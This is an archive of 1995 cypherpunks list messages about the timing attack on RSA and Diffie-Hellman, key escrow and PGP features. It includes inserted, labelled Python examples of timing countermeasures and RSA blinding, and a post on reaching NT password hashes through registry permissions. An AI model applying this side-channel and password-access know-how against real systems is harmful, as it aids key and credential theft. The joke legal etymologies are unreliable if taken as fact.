> To:            Bill Stewart <stewarts@ix.netcom.com>
> Subject:       Re: [NOISE] GAK and self-incrimination?
> From:          tallpaul@pipeline.com (tallpaul)
> Cc:            cypherpunks@toad.com

> If I'm not guilty why do I want strong crypto? Sometimes for the same
> reason I want a shredder.  And why do I want a shredder? Sometimes just to
> keep the local gossip from going through my papers after I throw them out. 

Another, not-so-obvious reason to encrypt stuff, especially stuff 
that goes out over the net, is that folks can suck your email off the 
net and gather all sorts of useful information.  This has all kinds 
of annoying implications, especially for people who gather 
demographics and other data for constructing email lists for sale.

-- short ed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 06:50:11 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <199512111810.NAA02186@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> I just read this paper, and while it is somewhat interesting, I
> don't think the walls of cryptography are in any danger of
> crumbling.
> 
> People employing systems like PGP are already advised to use them
> on private machines, with only one user, and untampered-with
> binaries.

Timings like the ones listed are trivial to take in establishing
things like SSL sessions, or Photuris sessions. The danger is to
online protocols, not to PGP.

Any reason you felt you had to say this anonymously?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 06:50:02 +0800
To: Eric Young <eay@mincom.oz.au>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.SOL.3.91.951211192419.28608P-100000@orb>
Message-ID: <199512111813.NAA02194@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young writes:
> Read the SKIP spec (SKIP is Sun's IP level encryption protocol).  It uses
> Diffie-Hellman certificates.

Photuris, which likely will be the standard way to do this sort of
thing on top of IPsec, also suffers from the problem, but I suspect
the next version of the draft (number 9) will have it fixed.

More interesting is the fact that a number of NSA vetted protocols
seem to have the flaw. Obviously, they either didn't know or didn't
say anything about it to the folks designing such stuff...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 05:31:37 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <199512111815.NAA02202@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> > I for one will probably add a flag for conditional compilation of my
> > bignumber library so that it will take constant time.  This may be a
> > %10 slow down (using small windows exponentiation) which is trivial
> > compared to the %30 speedup I will probably get when I implement a
> > faster mod function :-).
> 
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

The trivial way to handle this is simply to check user time with the
right system calls and make sure it always comes out the same with an
appropriate number of sleeps.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Tue, 12 Dec 1995 06:59:25 +0800
To: cypherpunks@toad.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...)
Message-ID: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 12/11/95 +0000, you wrote:
>Futplex wrote:
>> someone quoted:
>> Microsoft Knowledge Base article Q102716 says:
>> > Storage of the Passwords in the SAM Database
>> [...]
>> > The second encryption is decryptable by anyone who has access to the
>> > double-encrypted password, the user's RID, and the algorithm. The second
>> > encryption is used for obfuscation purposes.
>> 
>> Anyone feel like putting together some sample plaintext/ciphertext pairs ?
>
>This will be really difficult, and in practice rather pointless.  NT does
>not allow any user, privileged or not, to gain access to any form (encrypted
>or not) of the passwords.  They are stored in a protected area of the system
>registry that only the OS itself can access.  The best that you can do is
>to ask the OS whether a given username/password pair is valid or not, and it
>took until version 3.51 before MS let you do even that!

I took a quick look in my NT registry and you can get access to the Account
Manager section of the registry by manually changing the permissions and
giving yourself access.  I didn't have the time to look at all of the
entries in the registry, but there's a lot of stuff there and I wouldn't be
surprised if the encrypted passwords were available.  Of course, you have to
be an administrator to change the permissions, but it is possible.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 12 Dec 1995 07:02:56 +0800
To: perry@piermont.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com>
Message-ID: <199512111906.OAA01139@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>The trivial way to handle this is simply to check user time with the
>right system calls and make sure it always comes out the same with an
>appropriate number of sleeps.

Of course, this works against a remote adversary, but not against one
on the same machine who can look at actual CPU consumption (which doesn't
increase when the target is blocked).

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 12 Dec 1995 06:14:36 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Timing Attacks
Message-ID: <Pine.A32.3.91.951211141205.26486F-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm not so sure I see the great usefulness of this attack.

I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
comes down to essentially, if I understand it correctly, is that you need 
to be as sure of the timing as you can be.

Now, on a distributed system, you can't measure those timings, because 
any latency  could come from the originating computer, the links in the 
middle or any combination of them.

Also precise timings can be limited by fluctuating load averages amongst 
other things in a time-sharing computing environment.  While this might 
work in a lab, with the current advances in computing speed, the 
differences between a fast and a slow calculation can easily be opaqued 
by network lag.

Am I missing something, or does this attack only work in a lab?


Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 12 Dec 1995 14:50:02 +0800
To: cman@communities.com (Douglas Barnes)
Subject: In pursuit of the perfect frisbie (was NSA flying disk...)
In-Reply-To: <v02120d07acee50acb4f2@[199.2.22.120]>
Message-ID: <9512112033.AA00608@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
 <..snip..>
> obtaining one of these fine flying disks.
> (http://www.communities.com/foo/NSAfris.gif)
> 
> If you'd care to discuss this matter with Mr. Cisco yourself,
> he can be reached at: (301) 688 0701. Note that this is in
> Maryland. Also, the (301) 688 0606 number listed on the frisbee
> seems to be either always busy or not answered -- I'm assuming
> it's the # for the NSA tech transfer office.
> 

I also tried the public affairs department of the National Security
Agency at (301) 688-6524, with no luck.  They gave me the number of
the technology transfer office.  From then on out it was nothing but
busy signals.  (I guess there are many c'punks hammering them with 
phone calls...)

> Please let me know if any of you have better luck.
> 

I spoke with Mr. Cisco for several minutes, but he stated that the
NSA would not be at any trade shows in the Southern United States
any time soon.  He did state that they would be in Salt Lake, sometime
in the near future.

In a fit of despair, I called the local branch office of the Central
Intelligence Agency only to get an answering machine, in an attempt to
get the number for public affairs office.  (Maybe they have a cool
flying disk...)  I called the direct number for the Central 
Intelligence Agency and was grudgingly transferred to the public affairs 
office.  I was then given the number to the store that sells CIA stuff
at (703) 821-1414. 

[sigh] They don't have frisbees, but they do have the official CIA
shot glasses...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Tue, 12 Dec 1995 14:04:33 +0800
To: "'cypherpunks@toad.com>
Subject: ViaCrypt supports CKE in PGP
Message-ID: <c=US%a=_%p=INTERGRAPH%l=EXCH7951211144556JT00FA05@exch11>
MIME-Version: 1.0
Content-Type: text/plain


In today's mailbox I got a pack of marketing slicks from ViaCrypt. They're 
about to release ViaCrypt PGP 4.0 in two editions: Personal and Business. 
The 4.0 release adds some nice new features:
	- recipient groups for sending to several addresses at once
	- a Search dialog for finding keys
	- encryption-only & decryption-only keys
	- signature-only keys
	- key expiration dates
	- a Windows DLL that third-party developers can use (!!)

The biggies, though, are these:

	"Encryption automatically includes Corporate Access Key as additional 
recipient (option)"

and
	"Key selection/display dialogs show only keys certified by Corporate 
Access Key (option)"

So, real CKE will soon be available from an unexpected source. I'm not sure 
whether to be excited or dismayed. On the one hand, any movement towards 
CKE seems dangerously close to the slippery slope of GAK. On the other 
hand, I know a large corp like Intergraph is much more likely to license 
PGP for internal use if it has CKE features-- especially since they can 
hold the keys internally. The DLL is an awfully nice feature, too.

-Paul
--
Paul Robichaux, KD4JZG | perobich@ingr.com
Intergraph Corporation   | http://www.intergraph.com
Be a cryptography user.  | Not speaking for Intergraph
Co-author, "Building Internet Appls With Visual C++", Que Books 
(0-7897-0213-4)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Dec 1995 14:22:30 +0800
To: cypherpunks@toad.com
Subject: The origin of some heavy legal terms
Message-ID: <acf1e23a04021004fdea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 PM 12/11/95, Black Unicorn wrote:

>The term 'pressing a defendant for a plea' came from the practice of
>piling heavy weights on a defendant and 'pressing' him into the very
>floor of the court. (As defendants who did not admit a plea would save
>their family from being held accountable to judgment, the incentive to
>remain silent was high).  Often weight was piled atop the hapless
>defendant until he or she expired, having refused to enter a plea.

Modern courts have replaced the rocks used in earlier days with law books,
of course. The need for heavy law books to press the accused is one of the
main reasons electronic versions are not being adopted.

This practice also gave us the term "the full weight of the law" as well as
the symbol of the law as being a blind woman carrying a scale filled with
rocks to place upon the guilty to convince them to confess. (This was
originally done in the court's torture chamber, from which we get the term
"judge's chamber.")

Sometimes the "scales of justice" can be "tipped," which derives from the
practice of tipping the judge to get favorable rulings.

--Tim "Not a Lawyer" May







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 12 Dec 1995 11:39:15 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112125.QAA07753@homeport.org>
Message-ID: <30CCBA28.24F8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> 
> Jeff Weinstein wrote:
> 
> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> | out his wallet and handed him 10 crisp $100 bills.  :-)
> 
> Great.  mention it where the IRS is sure to be listening.  :)

  I know the spooks hang out here, but I didn't think the IRS
did.  Maybe the NSA just forwards them all net traffic that
includes the words cash, bills, etc.  :-)

  Since Paul mentioned it on his web page, and it was also
in a press release, I figured it was OK.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Tue, 12 Dec 1995 11:02:53 +0800
To: SBinkley@atitech.ca (Scott Binkley)
Subject: [NOISE] Re: Pornographic stories
In-Reply-To: <8043943A02502C79@-SMF->
Message-ID: <199512112333.PAA12799@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Scott Binkley writes:
 > Stop posting this type of crap on the Internet.

     I'd be pleased if people would refrain from posting to
inappropriate groups.  There are a number of acceptable venues for
pornography on the Net.

 > People like you are the ones to get everyone censored.

     If we censor ourselves, the bluenoses win.

 > Hopefully everyone else will flame you a thousand times over

     A polite note suggesting that one remember to log out when
leaving one's terminal unattended should suffice.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 1995 14:58:46 +0800
To: cypherpunks@toad.com
Subject: Third generation privacy
Message-ID: <199512112050.PAA12912@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp@netcom.com)" 
<khijol!netcom.com!ecarp>' wrote:  
  
  
>  
>Another, not-so-obvious reason to encrypt stuff, especially stuff   
>that goes out over the net, is that folks can suck your email off the   
>net and gather all sorts of useful information.  This has all kinds   
>of annoying implications, especially for people who gather   
>demographics and other data for constructing email lists for sale.  
>  
>-- short ed  
>  
  
Another related issue is what I'll call "third generation" privacy. This 
exists when I want privacy not for myself or even the person with whom I'm 
communicating but to protect the privacy of innocent third parties. E.g.:  
  
Grandpa is getting senile and I'm communicating with a second family member
on how we should handle the problem;  
  
My friend Jane was just raped and I'm communicating with a mutual friend 
about how we can help her.  
  
The anti-freedom forces have tried to define the parameters of the debate 
inside the boundaries of the "four horsemen." We need to understand that we
do not have to remain within those false boundaries and, in fact, it is 
very good not to.  
  
--tallpaul  
      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 13:44:35 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: Timing Attacks
Message-ID: <199512120026.QAA19309@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 PM 12/11/95 -0500, "Rev. Ben" <samman-ben@CS.YALE.EDU> wrote:
>I'm not so sure I see the great usefulness of this attack.
>
>I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
>comes down to essentially, if I understand it correctly, is that you need 
>to be as sure of the timing as you can be.
>
>Now, on a distributed system, you can't measure those timings, because 
>any latency  could come from the originating computer, the links in the 
>middle or any combination of them.
...
>Am I missing something, or does this attack only work in a lab?

It works much better in relatively controlled environments -
smart cards, for example, are usually both slow and not busy doing 
other things, plus you can get a bunch of them and analyze the 
variance in performance across cards.  The Usual Suspects say this
does appear to affect Fortezza, plus things like digital wallets
are obvious targets.  If you're clever, you can design smart-card readers
that do the measurements for you, and convince people to use them.

The attack also works better if you can try it multiple times with the same 
numbers to work around random latency; the lowest number is closest to real.
Running on time-shared machines increases randomness a lot (though if the
Bad Guys have an account there, they can watch the machine's performance
more closely.)  On the other hand, running on shared machines has
its own set of security risks, though they're better places for Diffie-Hellman
systems than secret keys - but Diffie-Hellman needs authentication to be
safe against MITM, and therefore there's still a secret key for that.

Interesting times....  We've all been discussing whether there'd be some
major theoretical-mathematics breakthrough, and along comes an engineering
attack.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
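
The wall-clock countermeasures proposed in this thread (sleeping a random time after the operation, padding to a fixed deadline) can be compared against repeated measurement in a small simulation. This is an added example, not part of any poster's message; every timing value, every name, and the additive noise and load model are constructed assumptions.

```python
"""Constructed simulation: no real crypto, no real network, no real sleeps."""
import random
from dataclasses import dataclass

# All values are constructed for illustration, in microseconds.
FAST_OP_US = 1000.0        # private-key operation for one class of inputs
SLOW_OP_US = 1100.0        # same operation for another class (secret-dependent)
NET_NOISE_MEAN_US = 200.0  # one-sided network/scheduling delay (exponential)
JITTER_MAX_US = 500.0      # upper bound of the random sleep after the operation
DEADLINE_US = 1500.0       # fixed response time, above the worst-case op time


@dataclass
class Sample:
    wall_us: float  # what a remote peer can measure
    cpu_us: float   # what process accounting on the same host would show


def respond(op_us, mitigation, rng, load_us=0.0):
    """Return one observation of a server answering under a mitigation."""
    busy = op_us + load_us  # assumption: load simply stretches the operation
    if mitigation == "none":
        server = busy
    elif mitigation == "random_sleep":
        server = busy + rng.uniform(0.0, JITTER_MAX_US)
    elif mitigation == "pad_to_deadline":
        # If the operation overran the deadline there is nothing left to pad.
        server = max(busy, DEADLINE_US)
    else:
        raise ValueError(f"unknown mitigation: {mitigation}")
    wall = server + rng.expovariate(1.0 / NET_NOISE_MEAN_US)
    # Sleeping consumes no CPU, so CPU accounting still shows the raw cost.
    return Sample(wall_us=wall, cpu_us=op_us)


def min_wall(op_us, mitigation, n, seed, load_us=0.0):
    """Smallest wall-clock time over n repeated requests with the same input."""
    rng = random.Random(seed)
    return min(respond(op_us, mitigation, rng, load_us).wall_us
               for _ in range(n))


def residual_leak(mitigation, n=5000, load_us=0.0):
    """Gap between the minimum observed times for slow and fast inputs."""
    fast = min_wall(FAST_OP_US, mitigation, n, seed=1, load_us=load_us)
    slow = min_wall(SLOW_OP_US, mitigation, n, seed=2, load_us=load_us)
    return slow - fast


def cpu_leak(mitigation):
    """Gap in CPU time, as seen by an observer on the same machine."""
    rng = random.Random(0)
    slow = respond(SLOW_OP_US, mitigation, rng).cpu_us
    fast = respond(FAST_OP_US, mitigation, rng).cpu_us
    return slow - fast


if __name__ == "__main__":
    for m in ("none", "random_sleep", "pad_to_deadline"):
        print(f"{m:16s} remote gap {residual_leak(m):7.1f} us"
              f"   cpu gap {cpu_leak(m):5.1f} us")
    loaded = residual_leak("pad_to_deadline", load_us=600.0)
    print(f"pad_to_deadline with 600 us of load: remote gap {loaded:7.1f} us")
```

With these parameters the minimum over repeated samples recovers most of the gap despite the random sleep, while padding hides it from a remote observer only as long as the operation finishes before the deadline; the CPU-time gap is the same in every case.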





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 12 Dec 1995 14:39:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC0D31.293C@netscape.com>
Message-ID: <199512112125.QAA07753@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:

| PS - I think Paul was a bit surprised when Jim Barksdale pulled
| out his wallet and handed him 10 crisp $100 bills.  :-)

Great.  mention it where the IRS is sure to be listening.  :)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Dec 1995 13:54:50 +0800
To: cypherpunks@toad.com
Subject: Voluntary Key Escrow is Freedom, Surveillance is Privacy
Message-ID: <acf1f957050210046c27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Citizen-unit jim bell wrote:

>Pardon me, but since this "key escrow" system was always claimed to be
>"voluntary," then how can there be any kind of legal penalties associated
>with "failure to release" those keys?
>
>
>Which raises another question:  Let's suppose I owned a product based on
>CKE, and I went to the escrow agent and said, "This escrow is voluntary,
>right?  If so, erase my key in your possession."
>
>Not that I'd trust them to do so, but how "voluntary" can a system be if
>people can't volunteer out of it?

In much the same sense the income tax system is "voluntary."

For further details, consult the definition of "newspeak" in Orwell's novel.

Remember, saying that Voluntary Key Escrow is neither "voluntary" nor
"escrow" is thoughtcrime.


Freedom is Slavery, Surveillance is Privacy, Censorship is Decency


--Citizen-Unit May227-80-5992


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 12 Dec 1995 14:58:25 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <9512112128.AA06989@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> > People employing systems like PGP are already advised to use them
> > on private machines, with only one user, and untampered-with
> > binaries.
> 
> Timings like the ones listed are trivial to take in establishing
> things like SSL sessions, or Photuris sessions. The danger is to
> online protocols, not to PGP.
> Perry

Loath as I am to disagree with Perry :-), is it really 'trivial' to take these 
timings in an online protocol? Paul writes on the DH example:

-------------------------
A preliminary implementation of the attack using the RSAREF toolkit[8] 
has been written. RSAREF scans across the exponent from MSB to
LSB and does two exponent bits at a time, so corresponding 
adjustments to the attack were made. Using a 120-MHz Pentium(TM) 
computer running MSDOS(TM), a 512-bit modulus, and a 256-bit secret 
exponent, processing times ranged from 392411 microseconds to 
393612 microseconds and closely approximated a normal distribution
with a mean of 393017 microseconds and a standard deviation of
188 microseconds.
--------------------------

Note that the range is 1201 microseconds

and for RSA:

--------------------------
RSAREF's modular reduction function with a 512-bit modulus on the 
same 120-MHz Pentium(TM) computer takes an average of 
approximately 17 microseconds less time if c is slightly smaller than 
p, as opposed to slightly larger than p. Timing measurements of 
many ciphertexts can be combined to detect whether the chosen 
ciphertexts are larger or smaller than p.
-------------------------
The range here is 17 microseconds.

Paul notes:
---------------------------
Random delays added to the processing time may increase the 
number of ciphertexts required, but do not completely solve the
problem since attackers can compensate for the delay by collecting 
more measurements. (If enough random noise is added, the attack 
can become infeasible.)
--------------------------

In a 'real' system, there is a lot of unpredictable variation
in the timing of the signal. Sources of such noise include
routers,  and other sessions on the server (any decent server these
days is multi-tasking, and can handle multiple connections 
simultaneously). On top of that, real protocols have a lot of
processing overhead, looking up certificates and keys, generating
MAC hash values, etc, many of which are difficult to predict.

I tried pinging some machines to look at the slop in the roundtrip
times. I have not checked traceroute, but for what it's worth,  I'm in 
central Massachusetts.

elnath (local to my lan)			<10 ms
rtfm.mit.edu (20 miles)			10-21 ms
iii1.iii.net (FreeBSD on a 120MHz P5, 35 miles)	100-200 ms
utopia.hacktic.nl (Netherlands)			190-781 ms

Maybe Paul can give us some figures as to how *much* random
noise is enough to make his (very elegant!) attack unfeasible. Note 
that the range of the random slop I'm getting is hundreds to thousands
of times the range of the signal he needs to detect. Statistical techniques, 
averaging the return times for the same text over many trials may be useful, 
but the number required to detect a less than 1% variation is going to be high.

The attack might be feasible if it can be mounted on a quiet server
from a point 'close' (in network terms) to the timing system, and the 
intervening network segments are also fairly quiet.  I don't think
random users are going to crack the Dilbert Store, however.

Speaking for myself....






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 12 Dec 1995 13:05:05 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111906.OAA01139@crypto.com>
Message-ID: <199512120056.QAA16055@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:

> Of course, this works against a remote adversary, but not against one
> on the same machine who can look at actual CPU consumption (which doesn't
> increase when the target is blocked).

Maybe this is a good reason to spinwait, rather than sleep, until
the timer expires.  It would be pretty subtle to distinguish that
from "real" computation.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Tue, 12 Dec 1995 14:16:14 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
In-Reply-To: <+cmu.andrew.internet.cypherpunks+Qkn8QTu00UfAE0yrN:@andrew.cmu.edu>
Message-ID: <9512112205.AA07602@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


samman-ben@CS.YALE.EDU writes:
>I'm not so sure I see the great usefulness of this attack.

It appears to be more practical than 99 percent of the "weaknesses"
that get published.  Not bad, I'd say.  It's also a very cute attack;
I'd never have guessed a priori that you could get that many key bits
from timing data.

>work in a lab, with the current advances in computing speed, the 
>differences between a fast and a slow calculation can easily be opaqued 
>by network lag.

"Random delays added to the processing time may increase the number of
ciphertexts required, but do not completely solve the problem since
attackers can compensate for the delay by collecting more
measurements.  (If enough random noise is added, the attack can
become infeasible.)"  [extended abstract, p. 5]

Sufficient network noise *might* make the problem go away, in some
cases, but that's a weak sort of claim to make about a cryptosystem.
(What if the attacker tries at six in the morning, or cracks a machine
local to you, or just gets lucky?)  You might put your server behind a
time-quantizing firewall...

Also, it's not just networked machines.  Smart cards may have a hard
time defending themselves against hostile card readers.  They're slow
already; the user may not appreciate the extra time spent for
obfuscation.  (This depends critically on the numbers, of course.)

--
   Eli Brandt
   eli+@cs.cmu.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 12 Dec 1995 11:25:32 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120100.UAA00263@jekyll.piermont.com>
Message-ID: <30CCD843.6231@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Tom Weinstein writes:
>
> > The problem with that approach is that if the system is heavily
> > loaded, it can take an arbitrarily large amount of user time.
> 
> Totally untrue. The process can take an arbitrary amount of wall clock
> time, not user time.

Whoops.  You are absolutely correct.  Pardon my brain-damage.  I
was thinking wall clock time, as you indicated.

> > Somewhat better is to sleep for a random amount of time after you're
> > done.
> 
> I don't think so. First of all, you can still extract some
> information. If you have been gone as long as the maximum computation
> plus the maximum random fudge, you know that you had to have conducted
> the maximum computation. This means that some bits are indeed
> leaking. Your approach also has the disadvantage that it is hard to
> produce good random numbers -- you are perhaps familiar with that
> problem?

Yes, you are correct.  It's better than taking a fixed amount of wall
clock time, but definitely not better than a fixed amount of user
time.

As Paul mentions in his extended abstract, there is actually an easy way
to fix the problem without hurting either latency or throughput much. 
If you blind and unblind around the modular exponentiation, it
appears impossible to perform this attack.  Because you don't know the
inputs to the exponentiation operation, you can't make any predictions
based on those inputs.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com
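
The blind/unblind step described in the message above, as an added example (not code from the thread, from Netscape, or from Kocher's abstract). The toy key built from two Mersenne primes and the names P, Q, N, E, D, private_op_blinded and exponentiation_inputs are assumptions made for the illustration.

```python
import secrets
from math import gcd

# Constructed toy RSA key (two Mersenne primes); far too small for real use.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent


def private_op(c):
    """Unblinded private-key operation: the caller chooses the exact input."""
    return pow(c, D, N)


def private_op_blinded(c):
    """Blind, exponentiate, unblind.

    Returns (c^D mod N, the value that was actually exponentiated) so the
    effect of blinding on the exponentiation input can be inspected.
    """
    while True:
        r = secrets.randbelow(N - 2) + 2   # fresh random r in [2, N-1] per call
        if gcd(r, N) == 1:                 # r must be invertible mod N
            break
    blinded = (c * pow(r, E, N)) % N       # c * r^E: unknown to whoever sent c
    s_blinded = pow(blinded, D, N)         # equals c^D * r (mod N)
    result = (s_blinded * pow(r, -1, N)) % N   # strip r again
    return result, blinded


def exponentiation_inputs(c, calls):
    """Submit the same c repeatedly; collect what the exponentiation saw."""
    seen = set()
    for _ in range(calls):
        result, blinded = private_op_blinded(c)
        if result != private_op(c):
            raise AssertionError("blinding changed the result")
        seen.add(blinded)
    return seen


if __name__ == "__main__":
    c = 0xC0FFEE                           # constructed sample ciphertext
    inputs = exponentiation_inputs(c, 20)
    print("distinct exponentiation inputs for one ciphertext:", len(inputs))
```

The result is identical to the unblinded operation, but each call exponentiates a different value, so timings cannot be correlated with inputs the sender picked. The two extra exponentiations (r^E and the inverse) are cheap next to the private-key operation.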




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 12 Dec 1995 15:04:44 +0800
To: cypherpunks@toad.com
Subject: Re: NIST GAK meeting writeup, part 3 of 3
Message-ID: <62487.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I apologise to the list for the character mangling in the original posting.
I wrote it in Word so I could spellcheck it, and I couldn't turn OFF the
idiotic smartquotes.  I've placed a cleaned up, fewer typo, and hyperlinked
version out on my NIST page,
http://www.isse.gmu.edu/~pfarrell/nist/pdf.nist2.html


  jim bell <jimbell@pacifier.com>  writes:

>>  Geoff said that they may want legislation support for
>>  protecting against illegal release of keys, failure to release, etc.

> Pardon me, but since this "key escrow" system was always claimed to be
> "voluntary," then how can there be any kind of legal penalties associated
> with "failure to release" those keys?

It was Geoff G. talking, not Mike Nelson or Ed Appel. The difference
is critical. Mike and Ed have some political savvy. My best friend Geoff
does not. I believe that Geoff has never bought into "voluntary" as
a concept. EPIC successfully FOIA'd papers from the FBI saying that
they will change their tune when/if there isn't sufficient compliance.

Mike and Ed are political enough to know that they can't sell this if
they push too hard. Geoff isn't.

The podium had a light that showed green/yellow/red lights. These
let the speakers know how much time was left. For the morning, since only
NIST/NSA/FBI/... folks talked, they didn't bother to reset the light.
It was red all the time, altho it blinked occasionally.

Ed took the mike, and asked "what is the red light for? Does it glow
red whenever someone from the Government is lying?" It got a good chuckle.
It was probably also close to being true. Ed and Mike understand
the audience, Geoff never will.

> Which raises another question:  Let's suppose I owned a product based on
> CKE, and I went to the escrow agent and said, "This escrow is voluntary,
> right?  If so, erase my key in your possession."
>
> Not that I'd trust them to do so, but how "voluntary" can a system be if
> people can't volunteer out of it?

It isn't voluntary for export approved software. The word voluntary is
not in the criteria. It is only voluntary if domestic users foolishly
choose to buy GAK'd products. So don't!

Criteria #2 says "...cryptographic functions shall be inoperable until the
